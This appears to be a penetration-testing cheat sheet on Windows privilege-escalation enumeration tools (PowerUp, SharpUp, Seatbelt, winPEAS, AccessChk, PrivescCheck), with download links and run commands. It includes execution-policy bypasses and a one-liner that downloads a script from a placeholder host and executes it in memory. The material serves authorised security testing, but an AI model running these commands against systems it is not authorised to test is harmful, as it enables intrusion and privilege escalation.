Automated enumeration script
PowerUp
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
To run PowerUp, start a PowerShell session and use dot sourcing to load the script:
CMD> powershell -exec bypass
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks
# Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations.
OR
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
SharpUp: (If Powershell is not available)
PowerUp & SharpUp are very similar tools that hunt for specific privilege escalation misconfigurations.
# Code: https://github.com/GhostPack/SharpUp
# Pre-Copiled: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe
To run SharpUp, start a command prompt and run the executable:
.\SharpUp.exe
Seatbelt
Seatbelt is an enumeration tool. It contains a number of enumeration checks.
It does not actively hunt for privilege escalation misconfigurations, but provides related information for further investigation.
# Code: https://github.com/GhostPack/Seatbelt
# Pre-Compiled: https://github.com/r3motecontrol/Ghostpa-CompiledBinaries/blob/master/Seatbelt.exe
To run all checks and filter out unimportant results:
.\Seatbelt.exe all
To run specific check(s):
.\Seatbelt.exe <check> <check>
winPEAS
winPEAS is a very powerful tool that not only actively hunts for privilege escalation misconfigurations, but highlights them for the user in the results.
# Code: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Before running, we need to add a registry key and then reopen the command prompt:
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
Run all checks while avoiding time-consuming searches:
.\winPEASany.exe quiet cmd fast
Run specific check categories:
.\winPEASany.exe quiet cmd systeminfo
accesschk.exe
AccessChk is an old but still trustworthy tool for checking user access control rights.
You can use it to check whether a user or group has access to files, directories, services, and registry keys.
The downside is more recent versions of the program spawn a GUI “accept EULA” popup window. When using the command line, we have to use an older version which still has an /accepteula command line option.
https://xor.cat/assets/other/Accesschk.zip
Always do this first
accesschk.exe /accepteula (always do this first!!!!!)
Find all weak file permission per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
Find all weak folder permission per drive
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
PrivescCheck
This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# From cmd
PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\Temp\> . .\PrivescCheck.ps1; Invoke-PrivescCheck
# From powershell
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
# By default, the scope is limited to vulnerability discovery but, you can get a lot more information with the -Extended option
Last updated